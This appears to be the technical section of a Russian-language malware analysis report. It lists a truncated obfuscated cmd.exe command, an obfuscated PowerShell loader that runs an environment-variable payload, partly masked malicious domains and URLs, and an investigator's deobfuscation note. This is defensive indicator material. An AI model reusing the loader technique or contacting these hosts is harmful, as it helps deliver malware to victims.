Техническая информация
- '<SYSTEM32>\cmd.exe' cmd.exe /c"set nQSdj= ((("{71}{102}{89}{130}{41}{6}{40}{94}{78}{9}{54}{64}{91}{39}{145}{147}{17}{63}{103}{111}{138}{50}{0}{80}{84}{32}{34}{140}{67}{85}{73}{129}{150}{42}{5}{20}{25}{65}{92}{72...
- 'kp#.ru':80
- 'kp#.ru':443
- 'mi#####giecocamp.com':80
- 'ac###last.ru':80
- 'lo##ic.com':80
- 'lo##ic.com':443
- http://kp#.ru/EjsaGtbK
- http://ac###last.ru/9FezrVftG
- http://lo##ic.com/PIjYc2I
- 'kp#.ru':443
- 'lo##ic.com':443
- DNS ASK uc##limp.ru
- DNS ASK kp#.ru
- DNS ASK mi#####giecocamp.com
- DNS ASK ac###last.ru
- DNS ASK lo##ic.com
- '<SYSTEM32>\cmd.exe' cmd.exe /c"set nQSdj= ((("{71}{102}{89}{130}{41}{6}{40}{94}{78}{9}{54}{64}{91}{39}{145}{147}{17}{63}{103}{111}{138}{50}{0}{80}{84}{32}{34}{140}{67}{85}{73}{129}{150}{42}{5}{20}{25}{65}{92}{72...' (со скрытым окном)
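- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ${ex`eC`UtioncO`NTE`Xt}.\"I`NV`oKEcomMAnD\".( \"{2}{3}{0}{1}\"-f 'scR','IPT','inVOk','E' ).Invoke( (.( \"{1}{2}{0}\"-f'iTEm','CH','ild' ) (\"{2}{1}{0}\"-f 'SDJ','Q','ENv:N' ) ).\"vaL`Ue\" )
  (Пояснение: после снятия обфускации — обратных апострофов и сборки строк оператором -f — эта команда соответствует `$ExecutionContext.InvokeCommand.InvokeScript((Get-ChildItem Env:nQSdj).Value)`, то есть PowerShell выполняет как скрипт значение переменной окружения nQSdj, которую задаёт приведённая выше команда `cmd.exe /c "set nQSdj=..."`. Сам скрипт в командной строке powershell.exe не виден, поэтому при расследовании нужно сопоставлять её с командной строкой родительского cmd.exe; выполняемый код, как правило, также попадает в журнал PowerShell Script Block Logging (событие 4104), если он включён.)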